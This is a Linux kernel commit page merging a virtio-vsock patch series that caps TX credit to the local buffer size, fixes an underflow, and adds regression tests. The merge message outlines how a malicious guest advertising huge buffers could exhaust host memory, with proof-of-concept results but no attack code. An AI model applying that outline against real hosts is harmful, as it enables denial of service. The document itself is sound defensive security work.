Skip to content

Commit 5778d65

Browse files
author
Paolo Abeni
committed
Merge branch 'vsock-virtio-fix-tx-credit-handling'
Stefano Garzarella says: ==================== vsock/virtio: fix TX credit handling The original series was posted by Melbin K Mathew <mlbnkm1@gmail.com> till v4. Since it's a real issue and the original author seems busy, I'm sending the new version fixing my comments but keeping the authorship (and restoring mine on patch 2 as reported on v4). v5: https://lore.kernel.org/netdev/20260116201517.273302-1-sgarzare@redhat.com/ v4: https://lore.kernel.org/netdev/20251217181206.3681159-1-mlbnkm1@gmail.com/ From Melbin K Mathew <mlbnkm1@gmail.com>: This series fixes TX credit handling in virtio-vsock: Patch 1: Fix potential underflow in get_credit() using s64 arithmetic Patch 2: Fix vsock_test seqpacket bounds test Patch 3: Cap TX credit to local buffer size (security hardening) Patch 4: Add stream TX credit bounds regression test The core issue is that a malicious guest can advertise a huge buffer size via SO_VM_SOCKETS_BUFFER_SIZE, causing the host to allocate excessive sk_buff memory when sending data to that guest. On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with 32 guest vsock connections advertising 2 GiB each and reading slowly drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only recovered after killing the QEMU process. With this series applied, the same PoC shows only ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the guest remains responsive. ==================== Link: https://patch.msgid.link/20260121093628.9941-1-sgarzare@redhat.com Signed-off-by: Paolo Abeni <pabeni@redhat.com>
2 parents ca1bb3f + 2a689f7 commit 5778d65

2 files changed

Lines changed: 133 additions & 9 deletions

File tree

net/vmw_vsock/virtio_transport_common.c

Lines changed: 21 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -28,6 +28,7 @@
2828

2929
static void virtio_transport_cancel_close_work(struct vsock_sock *vsk,
3030
bool cancel_timeout);
31+
static s64 virtio_transport_has_space(struct virtio_vsock_sock *vvs);
3132

3233
static const struct virtio_transport *
3334
virtio_transport_get_ops(struct vsock_sock *vsk)
@@ -499,9 +500,7 @@ u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 credit)
499500
return 0;
500501

501502
spin_lock_bh(&vvs->tx_lock);
502-
ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
503-
if (ret > credit)
504-
ret = credit;
503+
ret = min_t(u32, credit, virtio_transport_has_space(vvs));
505504
vvs->tx_cnt += ret;
506505
vvs->bytes_unsent += ret;
507506
spin_unlock_bh(&vvs->tx_lock);
@@ -822,6 +821,15 @@ virtio_transport_seqpacket_dequeue(struct vsock_sock *vsk,
822821
}
823822
EXPORT_SYMBOL_GPL(virtio_transport_seqpacket_dequeue);
824823

824+
static u32 virtio_transport_tx_buf_size(struct virtio_vsock_sock *vvs)
825+
{
826+
/* The peer advertises its receive buffer via peer_buf_alloc, but we
827+
* cap it to our local buf_alloc so a remote peer cannot force us to
828+
* queue more data than our own buffer configuration allows.
829+
*/
830+
return min(vvs->peer_buf_alloc, vvs->buf_alloc);
831+
}
832+
825833
int
826834
virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
827835
struct msghdr *msg,
@@ -831,7 +839,7 @@ virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
831839

832840
spin_lock_bh(&vvs->tx_lock);
833841

834-
if (len > vvs->peer_buf_alloc) {
842+
if (len > virtio_transport_tx_buf_size(vvs)) {
835843
spin_unlock_bh(&vvs->tx_lock);
836844
return -EMSGSIZE;
837845
}
@@ -877,12 +885,16 @@ u32 virtio_transport_seqpacket_has_data(struct vsock_sock *vsk)
877885
}
878886
EXPORT_SYMBOL_GPL(virtio_transport_seqpacket_has_data);
879887

880-
static s64 virtio_transport_has_space(struct vsock_sock *vsk)
888+
static s64 virtio_transport_has_space(struct virtio_vsock_sock *vvs)
881889
{
882-
struct virtio_vsock_sock *vvs = vsk->trans;
883890
s64 bytes;
884891

885-
bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
892+
/* Use s64 arithmetic so if the peer shrinks peer_buf_alloc while
893+
* we have bytes in flight (tx_cnt - peer_fwd_cnt), the subtraction
894+
* does not underflow.
895+
*/
896+
bytes = (s64)virtio_transport_tx_buf_size(vvs) -
897+
(vvs->tx_cnt - vvs->peer_fwd_cnt);
886898
if (bytes < 0)
887899
bytes = 0;
888900

@@ -895,7 +907,7 @@ s64 virtio_transport_stream_has_space(struct vsock_sock *vsk)
895907
s64 bytes;
896908

897909
spin_lock_bh(&vvs->tx_lock);
898-
bytes = virtio_transport_has_space(vsk);
910+
bytes = virtio_transport_has_space(vvs);
899911
spin_unlock_bh(&vvs->tx_lock);
900912

901913
return bytes;
@@ -1492,7 +1504,7 @@ static bool virtio_transport_space_update(struct sock *sk,
14921504
spin_lock_bh(&vvs->tx_lock);
14931505
vvs->peer_buf_alloc = le32_to_cpu(hdr->buf_alloc);
14941506
vvs->peer_fwd_cnt = le32_to_cpu(hdr->fwd_cnt);
1495-
space_available = virtio_transport_has_space(vsk);
1507+
space_available = virtio_transport_has_space(vvs);
14961508
spin_unlock_bh(&vvs->tx_lock);
14971509
return space_available;
14981510
}

tools/testing/vsock/vsock_test.c

Lines changed: 112 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -347,10 +347,12 @@ static void test_stream_msg_peek_server(const struct test_opts *opts)
347347
}
348348

349349
#define SOCK_BUF_SIZE (2 * 1024 * 1024)
350+
#define SOCK_BUF_SIZE_SMALL (64 * 1024)
350351
#define MAX_MSG_PAGES 4
351352

352353
static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
353354
{
355+
unsigned long long sock_buf_size;
354356
unsigned long curr_hash;
355357
size_t max_msg_size;
356358
int page_size;
@@ -363,6 +365,16 @@ static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
363365
exit(EXIT_FAILURE);
364366
}
365367

368+
sock_buf_size = SOCK_BUF_SIZE;
369+
370+
setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
371+
sock_buf_size,
372+
"setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
373+
374+
setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
375+
sock_buf_size,
376+
"setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
377+
366378
/* Wait, until receiver sets buffer size. */
367379
control_expectln("SRVREADY");
368380

@@ -2219,6 +2231,101 @@ static void test_stream_accepted_setsockopt_server(const struct test_opts *opts)
22192231
close(fd);
22202232
}
22212233

2234+
static void test_stream_tx_credit_bounds_client(const struct test_opts *opts)
2235+
{
2236+
unsigned long long sock_buf_size;
2237+
size_t total = 0;
2238+
char buf[4096];
2239+
int fd;
2240+
2241+
memset(buf, 'A', sizeof(buf));
2242+
2243+
fd = vsock_stream_connect(opts->peer_cid, opts->peer_port);
2244+
if (fd < 0) {
2245+
perror("connect");
2246+
exit(EXIT_FAILURE);
2247+
}
2248+
2249+
sock_buf_size = SOCK_BUF_SIZE_SMALL;
2250+
2251+
setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
2252+
sock_buf_size,
2253+
"setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
2254+
2255+
setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
2256+
sock_buf_size,
2257+
"setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
2258+
2259+
if (fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK) < 0) {
2260+
perror("fcntl(F_SETFL)");
2261+
exit(EXIT_FAILURE);
2262+
}
2263+
2264+
control_expectln("SRVREADY");
2265+
2266+
for (;;) {
2267+
ssize_t sent = send(fd, buf, sizeof(buf), 0);
2268+
2269+
if (sent == 0) {
2270+
fprintf(stderr, "unexpected EOF while sending bytes\n");
2271+
exit(EXIT_FAILURE);
2272+
}
2273+
2274+
if (sent < 0) {
2275+
if (errno == EINTR)
2276+
continue;
2277+
2278+
if (errno == EAGAIN || errno == EWOULDBLOCK)
2279+
break;
2280+
2281+
perror("send");
2282+
exit(EXIT_FAILURE);
2283+
}
2284+
2285+
total += sent;
2286+
}
2287+
2288+
control_writeln("CLIDONE");
2289+
close(fd);
2290+
2291+
/* We should not be able to send more bytes than the value set as
2292+
* local buffer size.
2293+
*/
2294+
if (total > sock_buf_size) {
2295+
fprintf(stderr,
2296+
"TX credit too large: queued %zu bytes (expected <= %llu)\n",
2297+
total, sock_buf_size);
2298+
exit(EXIT_FAILURE);
2299+
}
2300+
}
2301+
2302+
static void test_stream_tx_credit_bounds_server(const struct test_opts *opts)
2303+
{
2304+
unsigned long long sock_buf_size;
2305+
int fd;
2306+
2307+
fd = vsock_stream_accept(VMADDR_CID_ANY, opts->peer_port, NULL);
2308+
if (fd < 0) {
2309+
perror("accept");
2310+
exit(EXIT_FAILURE);
2311+
}
2312+
2313+
sock_buf_size = SOCK_BUF_SIZE;
2314+
2315+
setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
2316+
sock_buf_size,
2317+
"setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
2318+
2319+
setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
2320+
sock_buf_size,
2321+
"setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
2322+
2323+
control_writeln("SRVREADY");
2324+
control_expectln("CLIDONE");
2325+
2326+
close(fd);
2327+
}
2328+
22222329
static struct test_case test_cases[] = {
22232330
{
22242331
.name = "SOCK_STREAM connection reset",
@@ -2408,6 +2515,11 @@ static struct test_case test_cases[] = {
24082515
.run_client = test_stream_msgzcopy_mangle_client,
24092516
.run_server = test_stream_msgzcopy_mangle_server,
24102517
},
2518+
{
2519+
.name = "SOCK_STREAM TX credit bounds",
2520+
.run_client = test_stream_tx_credit_bounds_client,
2521+
.run_server = test_stream_tx_credit_bounds_server,
2522+
},
24112523
{},
24122524
};
24132525

0 commit comments

Comments
 (0)